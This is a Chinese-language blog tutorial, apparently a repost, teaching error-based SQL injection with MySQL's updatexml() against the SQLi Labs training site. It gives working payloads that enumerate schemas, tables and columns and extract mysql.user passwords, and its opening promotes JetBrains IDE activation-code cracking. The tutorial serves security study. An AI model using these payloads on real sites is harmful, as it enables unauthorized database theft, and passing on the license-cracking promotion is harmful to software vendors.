大家好，又见面了，我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。

Jetbrains全系列IDE稳定放心使用

「作者主页」：士别三日wyx
「作者简介」：CSDN top100、阿里云博客专家、华为云享专家、网络安全领域优质创作者
「专栏简介」：此文章已录入专栏《网络安全快速入门》

报错注入

一、初识报错注入
二、执行原理
三、步骤总结
四、实战案例

一、初识报错注入

C站老规矩：先说是什么，再说为什么。

这是一个测试网站（SQLi Labs靶场的第一关），功能很简单：在地址栏输入用户id，页面返回对应的用户信息。

比如，地址栏输入 ?id=1，页面返回id为1的用户名（Dumb）和密码（Dumb）：
在这里插入图片描述
正常情况下，页面只能返回用户信息，不能返回其他信息。

接下来，我们输入报错注入的payload

 ?id=1' and updatexml(1,concat(0x7e,version()),3) -- a

页面的报错信息中返回了数据库的版本：
在这里插入图片描述
这违背了网站原本的用意，除此之外，我们可以让报错信息显示数据库中的所有数据。

看到这里，相信你已经对报错注入有了初步的了解，接下来，我会一步一步的为大家讲解，报错注入究竟是怎样在报错信息中显示这些数据的。

二、执行原理

1. 代码逻辑分析

测试网站的功能很简单：根据id查询用户名和名：
在这里插入图片描述
执行流程分为三步：

用户输入参数（用户id）
后台执行SQL（查询用户信息）
查询结果在前端回显

在这里插入图片描述
明白网站的功能逻辑以后，我们来了解一下报错注入的核心：updatexml()

2. 报错函数

MySQL提供了一个 updatexml() 函数，当第二个参数包含特殊符号时会报错，并将第二个参数的内容显示在报错信息中。

我们尝试在查询用户id的同时，使用报错函数，在地址栏输入：?id=1' and updatexml(1, 0x7e, 3) -- a

在这里插入图片描述

提示：0x7e 等价于 ~

参数2包含特殊符号 ~，触发数据库报错，并将参数2的内容显示在报错信息中。

3. 拼接查询结果

如果我们在参数2的位置，将查询语句和特殊符号拼接在一起，就可以将查询结果显示在报错信息中，在地址栏中输入：

?id=1' and updatexml(1, concat(0x7e,version()), 3) -- a

在这里插入图片描述
参数2内容中的查询结果显示在数据库的报错信息中，并回显到页面。

提示：

version()：返回数据库版本
concat()：拼接特殊符号和查询结果，函数使用方式可以参考我的另一篇博客：MySQL concat函数使用详解

4. 长度限制

updatexml() 函数的报错内容长度不能超过32个字符，常用的解决方式有两种：

limit 分页
substr()截取字符

4.1 limit 分页

以查询数据库用户为例：

?id=-1' and updatexml(1,concat(0x7e,
	(select user
	from mysql.user limit 1,1)
),3) -- a

在这里插入图片描述

4.2 substr()截取字符

以查询数据库用户为例：

?id=-1' and updatexml(1,concat(0x7e,
	substr(
		(select group_concat(user)
		from mysql.user)
	, 1 , 31)
),3) -- a

在这里插入图片描述
理解报错注入的执行原理后，我们整理一下报错注入的步骤。

三、步骤总结

适用情况：页面有数据库的报错信息

报错信息必须是动态的、来自数据库的报错信息。
网站写死的、自定义的报错提示不算。

1. 判断是否报错

参数中添加单/双引号，页面报错才可进行下一步。

?id=1' -- a

2. 判断报错条件

参数中添加报错函数，检查报错信息是否正常回显

?id=1' and updatexml(1,'~',3) -- a

3. 脱库

获取所有数据库

?id=-1' and updatexml(1,concat('~',
	substr( 
		(select group_concat(schema_name)
		from information_schema.schemata)
	, 1 , 31)
),3) -- a

获取所有表

?id=1' and updatexml(1,concat('~', substr( (select group_concat(table_name) from information_schema.tables where table_schema = 'security')
	, 1 , 31)
),3) -- a

获取所有字段

?id=1' and updatexml(1,concat('~', substr( (select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users')
	, 1 , 31)
),3) -- a

四、实战案例

我们拿上面的测试网站（SQLi Labs 第一关）来举例，添加单引号查看是否报错，地址栏输入 ?id=1'
在这里插入图片描述
页面出现数据库的报错信息，适合使用报错注入，接下来，获取数据库用户的密码，地址栏输入：

?id=-1' and updatexml(1,concat('~', substr( (select password from mysql.user where user='mituan') 
    , 1 , 31)
),3) -- a

报错信息中返回用户密码：
在这里插入图片描述

感谢你的点赞、收藏、评论，我是三日，祝你幸福！·

发布者：全栈程序员-站长，转载请注明出处：https://javaforall.net/187381.html原文链接：https://javaforall.net

报错注入是什么？一看你就明白了。报错注入原理+步骤+实战案例「建议收藏」

报错注入

一、初识报错注入

二、执行原理

1. 代码逻辑分析

2. 报错函数

3. 拼接查询结果

4. 长度限制

4.1 limit 分页

4.2 substr()截取字符

三、步骤总结

1. 判断是否报错

2. 判断报错条件

3. 脱库

四、实战案例

发表回复

报错注入是什么？一看你就明白了。报错注入原理+步骤+实战案例「建议收藏」

报错注入

一、初识报错注入

二、执行原理

1. 代码逻辑分析

2. 报错函数

3. 拼接查询结果

4. 长度限制

4.1 limit 分页

4.2 substr()截取字符

三、步骤总结

1. 判断是否报错

2. 判断报错条件

3. 脱库

四、实战案例

相关推荐

FineCMS介绍

Mac下 Vim删除多行快捷键

PCA9685–16路 PWM模块舵机驱动板–STM32 IIC接口模块[通俗易懂]

SSM-Spring(2)_AOP[通俗易懂]

c++使用了未定义类型_c++如何新建

idea2021 激活码 csdn【永久激活】

发表回复